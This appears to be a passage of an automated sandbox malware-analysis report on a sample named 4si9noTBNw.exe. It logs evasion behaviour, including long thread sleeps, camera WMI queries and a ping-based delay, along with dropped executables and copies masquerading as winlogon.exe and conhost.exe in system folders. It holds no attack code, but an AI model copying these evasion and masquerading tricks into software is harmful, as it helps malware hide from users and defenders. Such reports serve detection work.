                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            Source: C:\Users\user\Desktop\4si9noTBNw.exe, WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                            Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe, Memory allocated: 1590000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe, Memory allocated: 1B410000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe, Memory allocated: 2680000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe, Memory allocated: 1A880000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe, Memory allocated: 930000 memory reserve | memory write watch
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe, Memory allocated: 1A690000 memory reserve | memory write watch
                            Source: C:\Users\Public\AccountPictures\winlogon.exe, Memory allocated: 1010000 memory reserve | memory write watch
                            Source: C:\Users\Public\AccountPictures\winlogon.exe, Memory allocated: 1AD70000 memory reserve | memory write watch
                            Source: C:\Users\Public\AccountPictures\winlogon.exe, Memory allocated: F90000 memory reserve | memory write watch
                            Source: C:\Users\Public\AccountPictures\winlogon.exe, Memory allocated: 1AAE0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe, Memory allocated: 1040000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe, Memory allocated: 1AC60000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe, Memory allocated: 13C0000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe, Memory allocated: 1B1D0000 memory reserve | memory write watch
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exe, Memory allocated: 2BC0000 memory reserve | memory write watch
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exe, Memory allocated: 1ADA0000 memory reserve | memory write watch
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exe, Memory allocated: DB0000 memory reserve | memory write watch
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exe, Memory allocated: 1AB90000 memory reserve | memory write watch
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exe, Memory allocated: 2780000 memory reserve | memory write watch
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exe, Memory allocated: 1A870000 memory reserve | memory write watch
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exe, Memory allocated: E50000 memory reserve | memory write watch
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exe, Memory allocated: 1A930000 memory reserve | memory write watch
                            Source: C:\Users\Public\AccountPictures\winlogon.exe, Memory allocated: 2F20000 memory reserve | memory write watch
                            Source: C:\Users\Public\AccountPictures\winlogon.exe, Memory allocated: 1B1C0000 memory reserve | memory write watch
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exe, Memory allocated: 2E80000 memory reserve | memory write watch
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exe, Memory allocated: 1B180000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe, Memory allocated: 1280000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe, Memory allocated: 1AD50000 memory reserve | memory write watch
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeThread delayed: delay time: 922337203685477
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\Public\AccountPictures\winlogon.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 600000
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 599781
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 598843
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 598625
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 598500
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 598343
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 3600000
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 597578
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 597359
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 597208
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 597068
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 596906
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 596761
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 596640
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 300000
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 596468
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 596347
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 596218
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 596108
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 595988
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 595859
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 595721
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 595580
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 595125
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 594822
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 594669
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 594495
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 594387
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 594278
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 594171
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 594062
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 593950
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 593842
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 593734
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 593625
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 593509
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 593399
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 593296
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 593187
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 593078
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 592968
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 592859
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 592726
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 592512
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 591978
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 591858
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 591749
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 591640
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 591528
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 591420
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 591309
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 591177
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 591048
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 590916
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 590773
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 590656
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 590546
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 590437
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 590326
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 590201
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeThread delayed: delay time: 590093
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1582
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1521
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2088
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1549
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1641
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2198
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWindow / User API: threadDelayed 5667
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeWindow / User API: threadDelayed 4038
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeDropped PE file which has not been started: C:\Users\user\Desktop\xWYkXXxo.logJump to dropped file
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeDropped PE file which has not been started: C:\Users\user\Desktop\hEXMkWTV.logJump to dropped file
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeDropped PE file which has not been started: C:\Users\user\Desktop\OuwhFfWF.logJump to dropped file
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeDropped PE file which has not been started: C:\Users\user\Desktop\exZDPEZZ.logJump to dropped file
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeDropped PE file which has not been started: C:\Users\user\Desktop\JzShoUtR.logJump to dropped file
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeDropped PE file which has not been started: C:\Users\user\Desktop\hMjNZkhU.logJump to dropped file
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeDropped PE file which has not been started: C:\Users\user\Desktop\YdQxpHbm.logJump to dropped file
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeDropped PE file which has not been started: C:\Users\user\Desktop\nocldQFM.logJump to dropped file
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 7616Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe TID: 7828Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe TID: 7844Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exe TID: 8320Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exe TID: 8336Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7780Thread sleep count: 1582 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7324Thread sleep time: -9223372036854770s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8024Thread sleep time: -1844674407370954s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7872Thread sleep count: 1521 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8164Thread sleep time: -12912720851596678s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8056Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7888Thread sleep count: 2088 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7340Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8064Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968Thread sleep count: 1549 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8160Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8000Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7792Thread sleep count: 1641 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8172Thread sleep time: -11068046444225724s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7976Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7860Thread sleep count: 2198 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8156Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7868Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 8352Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 8344Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exe TID: 8328Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exe TID: 8332Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exe TID: 8384Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exe TID: 8444Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\Public\AccountPictures\winlogon.exe TID: 8640Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exe TID: 8776Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 8936Thread sleep time: -30000s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -34126476536362649s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -600000s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -599781s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -598843s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -598625s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -598500s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -598343s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9044Thread sleep time: -7200000s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -597578s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -597359s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -597208s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -597068s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -596906s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -596761s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -596640s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9044Thread sleep time: -300000s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -596468s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -596347s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -596218s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -596108s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -595988s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -595859s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -595721s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -595580s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -595125s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -594822s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -594669s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -594495s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -594387s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -594278s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -594171s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -594062s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -593950s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -593842s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -593734s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -593625s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -593509s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -593399s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -593296s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -593187s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -593078s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -592968s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -592859s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -592726s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -592512s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -591978s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -591858s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -591749s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -591640s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -591528s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -591420s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -591309s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -591177s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -591048s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -590916s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -590773s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -590656s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -590546s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -590437s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -590326s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -590201s >= -30000s
                            Source: C:\Users\user\Desktop\4si9noTBNw.exe TID: 9060Thread sleep time: -590093s >= -30000s
                            Source: C:\Windows\System32\svchost.exe TID: 9140Thread sleep time: -30000s >= -30000s
                            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\Public\AccountPictures\winlogon.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Recovery\VTixufCejPQZEvXiB.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\Public\AccountPictures\winlogon.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files\Windows Defender\en-GB\conhost.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\4si9noTBNw.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe | Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Java\VTixufCejPQZEvXiB.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\AccountPictures\winlogon.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\AccountPictures\winlogon.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\4si9noTBNw.exe | Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Windows Defender\en-GB\conhost.exe | Thread delayed: delay time: 922337203685477
